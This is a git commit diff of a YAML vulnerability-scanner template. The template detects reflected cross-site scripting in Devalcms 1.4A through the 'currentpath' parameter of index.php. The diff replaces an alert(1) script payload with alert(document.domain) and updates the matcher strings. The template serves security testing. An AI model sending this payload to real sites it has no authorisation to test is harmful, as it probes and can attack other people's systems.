Update devalcms-xss.yaml
parent
289f1731bb
commit
4b6aa7df81
|
@ -1,26 +1,27 @@
|
|||
id: devalcms-xss
|
||||
|
||||
info:
|
||||
name: Devalcms 1.4A - Reflected Cross-Site Scripting
|
||||
name: Devalcms 1.4A - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6369
|
||||
description: |
|
||||
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
|
||||
tags: xss,unauthenticated,cms,reflected
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6369
|
||||
metadata:
|
||||
verified: true
|
||||
tags: devalcms,xss,cms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(1)</script>'
|
||||
- 'sub menu for: <script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
Loading…
Reference in New Issue